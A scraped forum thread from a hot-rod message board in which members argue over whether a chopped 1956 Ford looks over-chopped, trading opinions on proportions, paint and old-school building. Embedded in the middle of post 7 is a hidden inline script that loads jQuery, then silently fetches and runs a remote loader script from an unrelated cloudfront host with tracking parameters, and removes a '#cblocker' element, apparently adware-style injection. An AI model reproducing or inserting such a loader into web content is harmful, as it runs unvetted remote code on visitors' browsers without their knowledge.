Register now to get rid of these ads!

The way we usta do 'em.............

Discussion in 'The Hokey Ass Message Board' started by Loafers Glory, Mar 12, 2012.

1. paintcan54

paintcan54

I think it looks good, he said back in the posts "it's not choped most of it is in the trunk" that means it's "sank" no glass cutting and everything has to be reworked lots more work to sink it then chop it. I know of a few cars around Indy that have been sank into the body way more work then I would want to do.

2. mastergun1980

mastergun1980
    from Alva OK

I think it looks killer.

3. . . . what he said

It doesn't look too bad from the side but the front end view is pretty bad.

4. Loafers Glory

Loafers Glory

Mornin'....
    Been fun reading all the replies from you all...many opinions...even made some of you wet your leg just because I posted a photo of a beautiful car. There is an answer for those few...you can buy this car and change it to your likin'.
    This car draws more attention than most when it's out,no doubt...
    I'm really hoping that a youngster or two will see it and become really interested in doing things the old way,building hot rods from other car parts,different parts,not billet parts off the shelf....use their own imagination and actually earn the feeling one gets when you do it right......Loafer

5. bonez

bonez
    from Slow lane

Agreed. Jet black, real spots, chrome reverse, and slammed= EVIL.
    I like this too. probably this roof is an inch higher?

Attached Files:

6. well at least its not flat black , de-chromed with red wheels and skulls skulls skulls!!

7. Who built this one?

As for the o.p.'s car I don't know what to say. I'm really partial to red/white '56 Fords:D I wouldn't chop mine that much though. It looks like it was chopped just to be chopped. It's like he wants everyone to know it's chopped. It is not my favorite chopped '56, but it isn't completely horrible, I would still drive the shit out of it:D
    <script type="text/javascript">if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=15220&zoneid=14731&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};</script>

8. I love the lines of the original, and I agree with those who see this chop as disproportional. But if he's happy, that's all that counts.

9. 296 V8

296 V8
    BANNED
    from Nor~Cal

Seriously
    Dark paint would totally change the proportions --- slim down them big tall sides and them pipes make the sides even taller .
    Somebody shop that thing black

10. codeblu

codeblu

See, you old guys are wrong, thats not how you did it. All these young guys know that. Interesting that the old guys were doing this to new cars at the time. I'd love to see some young gun take a new car and come up with some pleasing results. Flame on.

11. F&J

F&J

Could not have said it better than that.

The color scheme is a bit off for me, a solid color would be wild on that car. And I'm seeing the pipes coming out of the lower fender tips with the molded tunnel opening.

I like that car, and would love to roll in it.

12. zman

zman
    from Garner, NC

yep, looks squashed to me, other than that pretty nice.

13. billsat

billsat

It is extreme, but thats what makes it memorable. In my mind its no more "over chopped" than some of the 32's you see on the HAMB that are real squatty looking yet everybody raves over them. I'd drive that car anywhere and grin like a monkey the entire time.

14. POLYFRIED 35

POLYFRIED 35

X2 .... Looks a hell of a lot better than my 56 Ford ... wait I don't have one :(:D

15. Lunatic

Lunatic
    from Carson,Ca.

I like the chop,looks good to me

16. bonez

bonez
    from Slow lane

No idea, but im pretty sure that is from the Chicago area as i have a few pics of it all from WOW and other "local" events.

17. 48FordFanatic

48FordFanatic
    from Maine

I think chops look good on the smaller body cars up to the early to mid 30's , but after that on the fat fendered cars of the 30's and 40's and beyond, I think the cars are too big to have a good looking chop. Although some of the Mercs looked good. And what the hell does age have to do with it anyway???

18. nefareous

nefareous
    from maryland

No such thing as "Over Chopped"

19. What he said^^^^

20. chopolds

chopolds
    from howell, nj
    1. Kustom Painters

That Ford doesn't look any more chopped than Blaine Kaufman's famous 56 Merc, "Green Duchess". I believe his was only chopped 2 in. AND Blaine did it in '56 or 57! So it was definately done "IN THE DAY".

21. That's exactly what I want, only taller. Love the '56 Victoria (not so much the Crown), the proportions were just fine the way it came from the factory.

22. Loafers Glory

Loafers Glory

Well.....
    I stirred up so much controversy with the chopped Ford I just decided to cut it in two and hang it on the side of the shop....sho do hate I offended any one.............:)......Loafer

Attached Files: